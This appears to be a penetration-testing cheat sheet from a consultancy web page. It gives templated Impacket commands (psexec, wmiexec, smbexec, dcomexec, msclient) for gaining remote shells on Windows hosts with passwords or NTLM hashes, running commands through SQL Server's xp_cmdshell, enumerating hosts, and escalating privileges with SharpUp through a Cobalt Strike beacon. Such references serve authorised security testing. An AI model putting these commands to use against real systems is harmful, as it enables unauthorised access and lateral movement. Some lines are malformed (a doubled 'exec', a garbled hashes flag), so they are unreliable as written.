top of page

The Cloud Source for Client Engagement Resources

Footholds

Using Impacket Remote Tools:

Syntax: {variable-placeholder}

without -c {cmd} returns a cmd shell

Impacket Examples Folder:

msclient.py - Provides SQL shell on Tgt
psexec.py - Executes a file on a remote host
smbexec.py - Executes a file on a remote host using SMB
wmiexec.py - Executes a file on a remote host WMI
dcomexec.py - Provides a limited shell via DCOM

msclient.py - example:

python msclient.py {sql-usr}:{Pswd}@{SqlSvr-ip}
- From prompt>
  - SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
  - SELECT TOP(5) * FROM {tbl-name};
  - exec exec master.dbo.xp_cmdshell {cmd-2-exec}

psexec.py - example:

python psexec.py {domain}/{user}:{Pswd}@{tgt-ip}
python psexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}
python psexec.py -d [domain] -hashes {0:NTLM-hash} -ip {tgt-ip} -command {cmd.exe -c }

wmiexec.py - example:

python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip}
python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}

dcomexec.py - example:

python dcomexec.py {domain}/{user}:{Pswd}@{tgt-ip}

Documenting Hosts from Cmd Shells

Windows Hosts:

hostname & ver & ipconfig | findstr /i "ipv4"

Nix Hosts:

uname -a & ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'

Privilege Escalation Techniques

SharpUp.Exe (https://github.com/GhostPack/SharpUp):

Via Cobalt Strike Beacon: execute-assembly SharpUp.exe

Placeholder - more to come!:

Pentest-Zen (ExitC0de00c.com)

bottom of page